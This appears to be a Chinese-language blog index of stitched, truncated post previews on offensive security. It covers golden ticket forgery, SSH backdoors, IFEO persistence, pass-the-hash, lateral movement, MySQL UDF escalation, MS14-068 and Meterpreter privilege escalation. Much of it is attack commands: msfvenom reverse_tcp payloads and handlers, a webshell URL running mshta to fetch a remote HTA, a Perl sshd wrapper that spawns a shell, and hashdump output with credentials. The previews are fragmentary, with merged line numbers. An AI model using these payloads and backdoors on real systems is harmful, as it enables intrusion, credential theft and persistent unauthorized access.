PTT
PASS The Ticket
黄金票据伪造原理
2.2 AS确认Client端登录者用户身份
KDC返回的 Msg B:使用 TGS密钥(KDC HASH / KRBTGT用户NTLM HASH) 加密的 TGT (TicketGranting-Ticket),当我们获取到krbtgt用户的 NTLM 哈希后,便可主动使用 krbtgt 用户的NTLM 哈希做为 TGS 密钥来生成 TGT 发送给KDC,这样KDC如果通过解密伪造 TGT 获取到伪造的[CLIENT/TGS SESSIONKEY] 可以成功解密 Authenticator 1 并完成与TGT中的数据进行比对,便成功骗过了KDC,也就是成功伪造了黄金票据
黄金票据伪造条件
域名称
域的SID值
域的 KRBTGT 账户密码 HASH
伪造用户名,可以是任意的
利用步骤
域名称(kc.local)
1whoami
域SID
12whoami /userwmic useraccount list brief
S-1-5-21-1444815315-2181078613-13 ...
SSH后门软链接SSHd123ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345ssh root@192.168.78.19 -p 12345
输入任意密码就可以 root 用户权限登陆,如果 root 用户被禁止登陆时,可以利用其他存在的用户身份登陆
Linux的一个后门引发对PAM的探究
SSH Server Wrapper1234567#!bashcd /usr/sbinmv sshd ../binecho '#!/usr/bin/perl' >sshdecho 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshdecho 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd
1socat STDIN TC ...
权限维持简介为了保证获取到的目标权限不会因为漏洞的修复而丢失,攻击者通常会在目标上安装一个后门,来保证对目标的持久化控制。
系统工具替换后门简介Windows 的辅助功能提供了额外的选项(屏幕键盘,放大镜,屏幕阅读等),可以帮助特殊人士更容易地使用操作系统。
然而,这种功能可能会被滥用于在启用 RDP 并获得 Administrator 权限的主机上实现持久化访问。这种技术会接触磁盘,或者需要修改注册表来执行远程存储的 payload。
涉及到的注册表项为 IFEO(Image File Execution Options),默认是只有管理员和Localsystem有权读写修改。
1HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
原理当我们按照常理运行属于IFEO列表的文件的时候(即可执行文件名在上述的注册表项下,出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就可以正常运行。)会 ...
PTH简介PASS THE Hash 也叫 Hash 传递攻击,简称 PTH。模拟用户登录不需要用户明文密码,就可以直接用获取到的 Hash 来登录目标系统。
利用成功的前提条件是:
开启 445 端口 SMB 服务
开启 admin$ 共享
Metasploit psexec模块获取Hash通过获取的Meterpreter会话执行hashdump得到用户hash值
1meterpreter > hashdump
12Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
执行直接就获取到meterpreter的PTH模块:exploit/windows/smb/psexec
工作组
添加路由
123sessions 1run autoroute -s 10.10. ...
横向移动简介当攻击者在拿下一台内网主机后,通常会利用当前拿下的机器当作跳板,进一步攻击内网其他主机,扩大攻击影响范围。
横向移动有三个主要阶段:
侦察(主机信息收集、内网网络结构信息收集)
凭据/特权收集(主机密码凭证)
对网络中其他计算机的访问权限
获得权限MSF生成HTA反弹shell
1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=4002 -f hta-psh -o 4002.hta
通过WEB漏洞反弹shell
1http://1xx.xx.xx.95:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=cmd /c mshta http://192.168.58.133:8000/6666.hta
得到MSF会话,获取账号密码及Hash
1hashdump
123getsystemload kiwicreds_all
1web\administrator 1qaz@WSX
登录验证
123c ...
MySQL提权利用场景目标主机开启MySQL远程连接,并且攻击者已经获得MySQL数据库连接的用户名和密码信息,通过UDF手工提权获得操作系统管理员权限。
拥有数据库账号密码,可以远程连接数据
拥有Webshell,可以连接数据库
能够写文件
可以操作数据库
如何获取数据库账号密码?
找数据库配置文件
通过Webshell对数据库进行本地爆破
Hash获取MySQL密码
UDF提权简介
UDF提权
UDF提权指的是利用注入漏洞或其他漏洞获取了数据库操作权限后,通过数据库输出具有提权功能的文件并执行提权操作。
UDF介绍
UDF: User Defined Function (用户自定义函数),为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令中执行命令。
dll文件存放目录
Windows 2003:C:\windows\目录下MySQL 5.1 版本后: ...
局域网访问打开CMD,导航到当前MySQL的bin路径,因为用的是phpstudy_pro集成环境,如下图
访问MySQL:输入MySQL -u root -p,点击Enter键,即可看到密码输入框:
输入密码,点需Enter键确定,即可看到如下图:表示访问MySQL成功。
首先选择数据库:
1use mysql;
添加局域网访问:
1update user set host = '%' where user = 'root';
或者
1GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.62.144.186' IDENTIFIED BY 'root';
将 *.* 上的所有权限授予由“root”标识的根“@”本地主机“;
刷新权限:
1flush privileges;
点击Enter键确定,出现如下图,表示刷新成功
使用Navicat连接Mysql(局域网连接,图片用的是用户hbsx,如果没有该用户可以创建该用户,上面 ...
域提权简介域环境提权,就是从普通域用户权限到域控管理权限
域渗透的主要目标就是拿下域控管理权限,拿下域控制器,进而拿下整个域
MS14-068漏洞简介该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。
微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068
漏洞原理服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控DC验证PAC的话,那么客户端可以伪造域管的权限来访问服务器。
利用条件
域控没有安装MS14-068的补丁KB3011780
拥有一台域内主机权限
具有普通域用户密码、Hash值以及用户SUID
漏洞利用
利用环境
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
利用工具
123MS14-068.exe: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068Psexec: h ...
Metasploit提权
生成一个Payload,并创建监听
12345678msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=6666 -f exe -oxx.exe# handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 6666use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.227set LPORT 6666exploit
运行木马文件,MSF获得meterpreter会话
Meterpreter提权Meterpreter自动提权命令
12getuidgetsystem
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户
执行成功
...
权限提升简介权限提升概述Windows 计算机中常见的权限
用户权限(Users)
管理员权限(Administrators)
系统权限 (SYSTEM)
访客权限 (Guest)
权限提升(Privilege Escalation ):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权。
Windows提权
123user --> administratoradministrator --> systemservices --> system
Linux提权
1user --> root
提权分类
本地提权
在一个低权限用户下,通过一些条件(应用程序漏洞、系统漏洞等)提升到系统管理员权限或系统最高权限。
远程提权
攻击者通过漏洞利用程序直接获取远程服务器的权限。
操作系统提权
Windows:MS06-067、MS10-084、MS11-014、MS11-05、MS12-020、MS16-032 等Linux:CVE-2017-7308、CVE-2017- ...